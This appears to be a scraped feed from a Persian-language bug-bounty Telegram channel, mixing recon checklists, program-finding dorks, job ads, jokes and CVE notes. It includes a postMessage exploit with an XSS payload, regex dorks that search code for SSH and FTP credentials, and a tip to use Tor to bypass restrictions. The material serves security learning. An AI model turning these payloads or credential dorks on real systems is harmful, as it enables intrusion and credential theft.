How Attackers Compromise Big Tech — From Bug Bounty to Incident Response

If you’re testing large tech companies like Google, To stay one step ahead of other hunters , You must do the following:

1. JS Files Monitoring -> Change -> New Attack Surface! (watch for new/changed JS bundles (can reveal hidden endpoints or secrets) Prefer passive collection (CDNs, GitHub, public repos))

2. Daily Looking for New Url -> Let’s Check (Track sitemaps, Wayback, GitHub, Katana ,crawler-snapshots; alert on new paths)

3. Daily Parameter Discovery -> New Parameter -> Check Parameter on all Paths -> New Attack Surface (collect params from historical sources daily. Only run active parameter fuzzing when a new param/endpoint appears or it is explicitly in-scope)

4. Daily FUZZ Headers for find new Header (don’t run broad daily header fuzzing against large platforms. Run limited, low-rate tests only on in-scope endpoints or after detecting a relevant change)

5. Daily Check Certificates(crt.sh and CT logs) for find New Asset (good to run daily; finds new hostnames/subdomains quickly)

6. Daily DNS Bruteforce for find New Asset (use passive feeds for daily checks. Active DNS brute-force should be rare and only for in-scope targets (and low-rate))

7. Daily Port Scan on Company’s IPs for find new open PORT (avoid daily wide port scans on large org IPs. If you have permission, do scheduled, rate-limited scans and only on known in-scope infrastructure)

8. Daily FUZZ on Sensitive ENDPOINTs (Deep fuzzing should be scheduled (e.g., monthly or on-release) and only for endpoints clearly in-scope with conservative rate limits)

9. Search Daily for the latest ASNs (Track newly announced ASNs or IP ranges related to the company to spot new assets)

10. Daily Monitoring LinkedIn, GitHub, GitLab, etc (OSINT: Looking for new Connections) & Daily Google Dorking (not Recommanded)

(use TOR to BYPASS RESTRICTION)

⭐️ @ZeroSec_team

اسکم پشت اسکم ای خدا مارو از این جبر جغرافیایی نجات بده
قضیه از این قراره هکروان هم بدون توضیحات خاصی اکانت هارو مسدود میکنه برای این کار افراد رو در رسانه های اجتماعی ردیابی و براساس یسری فرضیات و بدون مدرک خاصی، مسدود میکنه.

⭐️ @ZeroSec_team

تو این شرایط هوای هم دیگه رو داشته باشید سعی کنید تیم هایی باهم تشکیل بدید باهم کار کنید باگ بزنید و خودتون و خانوادتون رو از تورم و اقتصاد فاجعه این مملکت نجات بدید

من خودم تا چند وقت پیش میگفتم باگ بانتی اسکمه الان نظرم عوض شده🤣

⭐️ @ZeroSec_team

BugBounty Program Google Dorks (part1):

inurl /bug bounty
inurl : / security
inurl:security.txt
inurl:security "reward"
inurl : /responsible disclosure
inurl : /responsible-disclosure/ reward
inurl : / responsible-disclosure/ swag
inurl : / responsible-disclosure/ bounty
inurl:'/responsible disclosure' hoodie
responsible disclosure swag r=h:com
responsible disclosure hall of fame
inurl:responsible disclosure $50
responsible disclosure europe
responsible disclosure white hat
white hat program
insite:"responsible disclosure" -inurl:nl
intext responsible disclosure
site eu responsible disclosure
site .nl responsible disclosure
site responsible disclosure
responsible disclosure:sites
responsible disclosure r=h:nl
responsible disclosure r=h:uk
responsible disclosure r=h:eu
responsible disclosure bounty r=h:nl
responsible disclosure bounty r=h:uk
responsible disclosure bounty r=h:eu
responsible disclosure swag r=h:nl
responsible disclosure swag r=h:uk
responsible disclosure swag r=h:eu
responsible disclosure reward r=h:nl
responsible disclosure reward r=h:uk
responsible disclosure reward r=h:eu
"powered by bugcrowd" -site:bugcrowd.com
"submit vulnerability report"
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"
site:*.gov.* "responsible disclosure"
intext:"we take security very seriously"
site:responsibledisclosure.com
inurl:'vulnerability-disclosure-policy' reward
intext:Vulnerability Disclosure site:nl
intext:Vulnerability Disclosure site:eu
site:*.*.nl intext:security report reward
site:*.*.nl intext:responsible disclosure reward
"security vulnerability" "report"
inurl"security report"
"responsible disclosure" university
inurl:/responsible-disclosure/ university
buy bitcoins "bug bounty"

⭐️ @ZeroSec_team

BugBounty Program Google Dorks (part2):

inurl:/security ext:txt "contact"
"powered by synack"
intext:responsible disclosure bounty
inurl: private bugbountyprogram
inurl:/.well-known/security ext:txt
inurl:/.well-known/security ext:txt intext:hackerone
inurl:/.well-known/security ext:txt -hackerone -bugcrowd -synack -openbugbounty
inurl:reporting-security-issues
inurl:security-policy.txt ext:txt
site:*.*.* inurl:bug inurl:bounty
site:help.*.* inurl:bounty
site:support.*.* intext:security report reward
intext:security report monetary inurl:security
intext:security report reward inurl:report
site:security.*.* inurl: bounty
site:*.*.de inurl:bug inurl:bounty
site:*.*.uk intext:security report reward
site:*.*.cn intext:security report reward
"vulnerability reporting policy"
"van de melding met een minimum van een" -site:responsibledisclosure.nl
inurl:responsible-disclosure-policy
"If you believe you've found a security vulnerability"
intext:"BugBounty" and intext:"BTC" and intext:"reward"
intext:bounty inurl:/security
inurl:"bug bounty" and intext:"€" and inurl:/security
inurl:"bug bounty" and intext:"$" and inurl:/security
inurl:"bug bounty" and intext:"INR" and inurl:/security
inurl:/security.txt "mailto*" -github.com  -wikipedia.org -portswigger.net -magento
/trust/report-a-vulnerability
site:*.edu intext:security report vulnerability
"cms" bug bounty
"If you find a security issue"  "reward"
"responsible disclosure" intext:"you may be eligible for monetary compensation"
inurl: "responsible disclosure", "bug bounty", "bugbounty"
intext: we offer a bounty
responsible disclosure inurl:in
site:*.br responsible disclosure
site:*.at responsible disclosure
site:*.be responsible disclosure
site:*.au responsible disclosure
site:*/security.txt "bounty"
inurl:bug bounty intext:"rupees"
inurl:bug bounty intext:"₹"
inurl:responsible disclosure intext:"INR"
"vulnerability disclosure program" AND (bounty OR reward OR swag OR "hall of fame")
"responsible disclosure" AND (monetary OR cash OR "gift card" OR crypto OR BTC)
"security@*" AND ("bug bounty" OR "vulnerability disclosure") ext:txt
"powered by yeswehack" OR "powered by federacy" OR "powered by intigriti" -site:yeswehack.com -site:federacy.com -site:intigriti.com
"submit vulnerability report" -site:hackerone.com -site:bugcrowd.com -site:synack.com -site:openbugbounty.org
inurl:/.well-known/security.txt intext:bounty -hackerone -bugcrowd -synack

⭐️ @ZeroSec_team

🔔 استخدام کارشناس ارشد تست نفوذ اپلیکیشن

💰 حقوق: +۵۰ میلیون تومان
📍 محل همکاری: حضوری – تهران

به‌صورت فوری به‌دنبال جذب ۲ کارشناس تست‌نفوذ (میدل یا سینیور) هستیم.

🔑 شرایط و مهارت‌ها:

تسلط کامل به تست نفوذ وب‌اپلیکیشن

مسلط یا علاقه‌مند به تست نفوذ موبایل

توانایی کار تیمی و مسئولیت‌پذیری

🎯 اولویت با دانشجویان و فارغ‌التحصیلان «هانت‌لرن» خواهد بود.

💼 همکاری با شرایط عالی و حقوق رقابتی.

📩 برای ارسال رزومه اقدام بفرمایید:
@huntlearn_support

#MLSecOps
#Tech_book
"Adversarial AI Attacks, Mitigations, and Defense Strategies: A cybersecurity professional’s guide to AI attacks, threat modeling, and securing AI with MLSecOps', 2024.

// The book is for cybersecurity professionals, such as security architects, analysts, engineers, ethical hackers, pentesters, and incident responders, but also developers and engineers designing, building, and assuring AI systems

⭐️ @Zerosec_team

اتصال بانک مرکزی ایران از سوییفت قطع شد!

SWIFT باگ بانتی داره؟🤣🤣

⭐️ @ZeroSec_team

بنظرتون بهش فایل ماکرو بدم باز میکنه؟🤔

⭐️ @ZeroSec_team

سرویس اوپن سورس formbricks یه cve خورده
۱۱ هزار star داره توی گیتهاب و بیشتر از ۱۰۰ تا Contributors

حالا باگش چی بوده
موقعی که jwt رو decode میکنه هیچ secret key یا الگوریتمی برای وریفای کردن استفاده نمیکنه

export const verifyToken = async (token: string): Promise<JwtPayload> => {
  // First decode to get the ID
  const decoded = jwt.decode(token);
  const payload: JwtPayload = decoded as JwtPayload;

https://github.com/formbricks/formbricks/security/advisories/GHSA-7229-q9pv-j6p4

#CVE-2025-59934

https://cybersecuritynews.com/whatsapp-0-click-vulnerability-exploited/

از اسلاگش مشخصه درمورد چیه

⭐️ @ZeroSec_team

امروز داشتم یه ریپورتی در رابطه با postMessage میخوندم که دوست داشتم که اینجا بازش کنم :
ما یه همچین listener ای رو داریم :

Receiver: function (e) {
  var n, r = this.get("replaceRoute"), i = this.get("referrer");
  if (!i || e.origin === normalize(i)) {
    try { n = JSON.parse(e.data); } catch (u) {}
    // ...
  }
}

خب حالا مشکل این listener چیه ؟ توی این قسمت if (!i داره چک میکنه که اگه referrer خالی باشه این شرط پاس بشه و مشکلی نداره پس اگه referrer ما خالی باشه دیگه به شرط بعدی e.origin نمیرسه و نکته مهمی که اینجا هست اینه که توی postMessage هیچ هدر referrer ای ست نمیشه پس اگه من یه sender داشته باشم به راحتی میتونم به اینجا Message بفرستم.
پس کد sender ما میشه :

win = window.open("https://transact.victim.com/");
win.postMessage(JSON.stringify({
                action: "replaceRoute",
                route: "application_error",
                model: { error: 500, noscript: "injected", message: "from attacker" }
            }), "*");

حالا تو ادامه اش هم اومده بود یه route دیگه پیدا کرده بود که اونجا xss میخورد :

win.postMessage(JSON.stringify({
                action: "replaceRoute",
                route: "voucher.multi-product-details",
                model: {
                    eligible: true,
                    sku: {
                        id: 0, longDenoscription: `
                            <img src=x onerror='alert(document.domain)'>`
                    }
                }
            }), "*");

ترجمه کتاب Pentesting Active Directory

⭐️ @ZeroSec_team

⚠️ 𝗖𝗿𝗶𝘁𝗶𝗰𝗮𝗹 𝗩𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗶𝗹𝗶𝘁𝘆 𝗶𝗻 𝗗𝗷𝗮𝗻𝗴𝗼 𝗙𝗿𝗮𝗺𝗲𝘄𝗼𝗿𝗸
The Django library has announced a very critical vulnerability (CVE-2025-57833) that allows attackers to perform SQL Injection on servers using the framework

🔍 𝗪𝗵𝗮𝘁 𝗵𝗮𝗽𝗽𝗲𝗻𝗲𝗱?
• The flaw is in the FilteredRelation component inside the ORM.
• An attacker can exploit it by passing a specially crafted dictionary to QuerySet.annotate() or QuerySet.alias().
• Result: SQL Injection = ability to manipulate queries, access sensitive data, or even take full control of the server.

⚠️ 𝗔𝗳𝗳𝗲𝗰𝘁𝗲𝗱 𝘃𝗲𝗿𝘀𝗶𝗼𝗻𝘀:
• Django 5.2
• Django 5.1
• Django 4.2 (LTS)
• And also the main development branch.

🛡️ 𝗪𝗵𝗮𝘁’𝘀 𝘁𝗵𝗲 𝘀𝗼𝗹𝘂𝘁𝗶𝗼𝗻?
Immediate update required to:
• Django 5.2.6
• Django 5.1.12
• Django 4.2.24
-
#CyberSecurity
#Django
#SQLInjection
#CVE2025

⭐️ @ZeroSec_team

نقش ‌ها و مسئولیت ‌ها در Red Team Engagement

برای اجرای درست یه تست Red Team فقط داشتن تیم حمله کافی نیست.
باید نقش ‌ها و مسئولیت ‌های مختلف به ‌درستی تعریف و انتخاب بشن این کار معمولاً توسط مدیریت سازمان (CISO/CIO) و Engagement Control Group (ECG) انجام میشه.

Red Team :
Red Team Lead مسئول کل عملیات، هماهنگی با ECG/White Cell، تهیه گزارش نهایی
Red Team Operators اجراکننده‌ی حملات


Blue Team :
تیم دفاع سازمان (SOC/IT Security) که ممکنه مطلع باشند یا نباشند (Announced ,Unannounced)


White Cell :
نقش ناظر و یا داور که وظیفه اجرای ROE و همبستگی برای جلوگیری از آسیب واقعی کند (بدون کمک به Blue Team)


Engagement Control Group (ECG) :
تیم تصمیم گیرنده اعضا مدیران ارشد (CIO,CISO,COO) یک نماینده IT , نماینده White Cell , نماینده RedTeam وظیفه تصویب اهداف دامنه تایم لاین قوانین و تصمیم گیری درمورد اطلاع رسانی operation به BlueTeam و انتخاب TA ها


Trusted Agent (TA) :
فرد مورد اعتماد داخل سازمان که وظیفه جلوگیری از آسیب جدی به داده / زیرساخت و کارکنان را دارد اطلاعات محرمانه دارد ولی نباید چیزی به Blue Team بده مگر با تایید ECG


Observers :
فقط برای مستند سازی هیچ دخالتی در عملیات ندارند


⭐️ @ZeroSec_team

نویسنده خودش سابقۀ FBI داره و روش ‌هاش هم کاربردی و هم قانونی هستن

⭐️ @ZeroSec_team

The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!

Eg, find SSH and FTP passwords via connection strings with:

/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/

⭐️ @ZeroSec_team

فقط اونایی که قضیه رو میدونن🤣🤣🤣🤣

اگه دوس داشتید دنبال کنندگان شما هم جزیی از این چالش باشند میتونید این پست رو به انتشار بزارید❤️🙏🏼


https://www.instagram.com/p/DPQrtnjjUS8/?igsh=MW9zejR5M2t3bGNyaw==

Hacking smarter with Burp AI: NahamSec puts Burp AI to the test

https://portswigger.net/blog/hacking-smarter-with-burp-ai-nahamsec-puts-burp-ai-to-the-test

⭐️ @ZeroSec_team

🔴 خلاصه‌ای از 10 سال اخیر ایران ؛

تحریم
کرونا
دلار
طلا
جنگ
مکانیسم ماشه
آب
برق
زلزله
سیل
خشکسالی
اسکم های Bugcrowd

🔁این لیست آپدیت میشه